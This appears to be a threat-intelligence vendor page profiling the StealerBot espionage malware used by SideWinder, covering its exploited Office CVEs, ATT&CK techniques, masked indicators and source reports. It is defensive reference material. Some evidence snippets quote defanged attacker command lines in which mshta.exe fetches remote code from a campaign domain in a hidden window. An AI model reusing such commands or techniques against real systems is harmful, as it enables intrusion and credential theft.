MalwareUsed by 1 actorExploits 2 CVEs

StealerBot

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

EXPLOITED CVES

Vulnerabilities exploited

2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

2 CVES

CVE-2017-11882Microsoft Office Equation Editor Remote Code ExecutionExploited in the wild

The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”.

via securelistsecurelist.com

CVE-2017-0199Microsoft Office/WordPad Remote Code Execution VulnerabilityExploited in the wild

→ DLL sideloading via legitimate signed binary → StealerBot (modular, in-memory espionage framework) | The DOCX file exploits CVE-2017-0199 to fetch a remote template from internal-advisory-azerbaijan-russia-diplomatic-crisis[.]defence-np[.]net.

via breakglass intelintel.breakglass.tech

THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

SideWinder

This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.

via securelistsecurelist.com

MITRE ATT&CK

Techniques & procedures

26 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques

T1566PhishingEvidence1

The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker.

T1566.001Spearphishing AttachmentEvidence3

The attacker sends spear-phishing emails with a DOCX file attached.

Execution

4 techniques

T1059Command and Scripting InterpreterEvidence1

Live Console (Module 0xcb) -- reverse shell access

T1059.003Windows Command ShellEvidence2

By default, the malware starts a new “cmd.exe” process, forwards data received from the attacker to its standard input, and forwards the process output or error pipeline to the attacker.

T1059.007JavaScriptEvidence1

The exploit file contained a shellcode... to run embedded JavaScript code invoking the mshtml . RunHTMLApplication function.

T1203Exploitation for Client ExecutionEvidence2

The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process.

Privilege Escalation

3 techniques

T1055Process InjectionEvidence1

RDP Credential Stealer (Module 0xe0) -- mstsc.exe injection

T1548Abuse Elevation Control MechanismEvidence1

UAC Bypass (Module 0xd6) -- CMSTP and IElevatedFactoryServer COM exploitation

T1548.002Bypass User Account ControlEvidence1

UACBypass... designed to bypass UAC and run malicious code with high privileges... By default, it tries to abuse the CMSTP program... If these security solutions are detected, the malware attempts to use... the “IElevatedFactoryServer” COM object.

Stealth

6 techniques

T1027Obfuscated Files or InformationEvidence2

The remote HTA embeds a heavily obfuscated JavaScript file... strings, initially encoded with a substitution algorithm... embedded within its code as a base64-encoded .NET serialized stream.

T1055Process InjectionEvidence1

RDP Credential Stealer (Module 0xe0) -- mstsc.exe injection

T1218.005MshtaEvidence2

the embedded JavaScript runs the Windows utility mshta . exe and obtains additional code from a remote server

T1497Virtualization/Sandbox EvasionEvidence1

The RTF delivery includes server-side geofencing (likely IP-based victim filtering) and User-Agent validation requiring legitimate Microsoft Office strings, ensuring that sandboxes and researchers receive decoy content or 404s.

T1564.003Hidden WindowEvidence1

gShZVnyR.Run('mshta.exe https://dgtk.depo-govpk[.]com/19263687/trui',0);

T1620Reflective Code LoadingEvidence1

Finally, it loads the data as a .NET assembly and invokes the “Program.ctor” method... We never observed any of the implant components on the filesystem. They are loaded into memory by the Backdoor loader module.

Credential Access

5 techniques

T1056Input CaptureEvidence2

This module attempts to harvest the user’s Windows credentials by displaying a phishing prompt designed to deceive the victim.

T1056.001KeyloggingEvidence2

This module uses the “SetWindowsHookEx” function specified in the “user32.dll” library to install a hook procedure and monitor low-level keyboard and mouse input events. The malware can log keystrokes...

T1539Steal Web Session CookieEvidence1

The module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services...

T1555Credentials from Password StoresEvidence2

The module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services...

T1649Steal or Forge Authentication CertificatesEvidence1

File Stealer (Module 0xd4) -- targets .ppk ... For a diplomatic target, the file stealer and credential modules are the priority. .ppk files (PuTTY private keys) are specifically targeted

Discovery

1 technique

T1497Virtualization/Sandbox EvasionEvidence1

Collection

5 techniques

T1005Data from Local SystemEvidence2

The File Stealer module collects files from specific directories. It also scans removable drives to steal files with specific extensions.

T1025Data from Removable MediaEvidence1

It also scans removable drives to steal files with specific extensions.

T1056Input CaptureEvidence2

This module attempts to harvest the user’s Windows credentials by displaying a phishing prompt designed to deceive the victim.

T1056.001KeyloggingEvidence2

T1113Screen CaptureEvidence2

This module periodically grabs screenshots of the primary screen.

Command and Control

3 techniques

T1071Application Layer ProtocolEvidence1

A single MD5 hash and a filename... Behind that hash was a SideWinder APT command-and-control domain hosting four simultaneous espionage campaigns...

T1105Ingress Tool TransferEvidence2

mshta . exe hxxps : //dgtk.depo-govpk[.]com/19263687/trui ... The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware

T1219Remote Access ToolsEvidence1

Live Console... can be used as a passive backdoor, listening to the loopback interface, or as a reverse shell, connecting to the C2 to receive commands.

Other

1 technique

T1562.001Disable or Modify ToolsEvidence1

The library can also process custom commands that provide the following capabilities... Add Windows Defender exclusions;

INDICATORS OF COMPROMISE

IOCs tracked for this family

217 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

157 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes

59 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other

1 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

domain●●●●●●●●●●●●View more in app3 months ago

hash.sha256●●●●●●●●●●●●View more in app3 months ago

ip.v4●●●●●●●●●●●●View more in app3 months ago

ACTIVITY FEED

Recent activity

3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

3 SOURCESView more in app

breakglass intelNews

Apr 3, 2026

One Hash, One Typo, and a New Front: How SideWinder Brought Its Espionage Machine to the Caucasus - Breakglass Intelligence - Breakglass Intelligence

A SideWinder-exclusive modular in-memory espionage framework used as the final payload. Recovered modules include keylogging, reverse shell access, screenshot capture, file theft, UAC bypass, RDP credential theft, token grabbing from browsers and online services, and credential phishing via spoofed Windows credential prompts.

securelistNews

May 13, 2021

SideWinder APT’s post-exploitation framework analysis | Securelist

A modular .NET espionage implant used post-compromise by SideWinder. It is loaded in memory by a backdoor loader and managed by an Orchestrator component that communicates with C2 to load plugins. Observed capabilities include installing additional malware, capturing screenshots, keylogging, stealing browser passwords and tokens, intercepting RDP credentials, stealing files, launching a reverse shell/live console, phishing Windows credentials, and bypassing UAC.

securelistNews

May 13, 2021

SideWinder APT attacks in H2 2024 | Securelist

A sophisticated in-memory implant and private post-exploitation toolkit used exclusively by SideWinder for espionage-oriented operations. In this campaign it is loaded into memory by Backdoor Loader, and the article notes the implant itself remained unchanged while loader variants evolved.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching217

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities2

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping26

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.